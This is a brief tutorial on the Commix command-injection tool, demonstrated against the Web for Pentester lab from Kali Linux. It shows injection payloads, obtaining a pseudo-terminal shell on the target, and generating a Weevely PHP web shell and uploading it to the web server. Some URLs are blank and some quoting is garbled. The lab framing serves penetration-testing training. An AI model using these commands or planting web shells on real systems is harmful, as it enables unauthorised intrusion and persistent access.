Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, by web developers, penetration testers, or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.
By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. It is written in Python programming language.
Requirements and Installation
Requires version 2.6.x and above to run this tool, it can be downloaded from the GitHub.
root@kali:~# git clone, can be installed through Ubuntu’s APT (Advanced Packaging Tool)
root@kali:~# apt-get install commixSupported Platforms
- Linux
- Mac OS X
- Windows (experimental)
Classic Injection
Step1: Download and mount the Pentester lab exercise Web for Pentester and then you can reach the labs from your Kali machine browser Ex:
Step 2: You can find command line Injection exercises.

Step 3: Now in Kali type commix and copy the path for example 1.
INJECT_HERE – It will try to inject various queries here.
root@kali:~# commix –url=””
It checks for various payloads and successful with Payload: ;echo WIBYAT$((24+78))$(echo WIBYAT)WIBYAT.
Then it asks to connect with a terminal shell Do you want a Pseudo-Terminal shell? [Y/n/q] > By pressing “y” we can get the terminal access for the machine.
Blind Injection
commix –url=”″ –os=U –technique=”tf” -v 1
Injecting Weevely PHP web shell
Step 1: Create a payload with weevely, if weevely is not installed you can use apt-get install weevely.
Step 2: Launch weevely and generate a PHP web shell.
root@kali:~# weevelyroot@kali:~# weevely generate commix /root/Desktop/Commix/shellexploit.php
Step 3: To upload the file in the remote host, use the following command.
–file-write = File to write in the destination host
–file-dest = Filepath to write or Upload
commix –url=”” –file-write=’/root/Desktop/Commix/shellexploit.php’ –file-dest=”/var/www/upload/images/”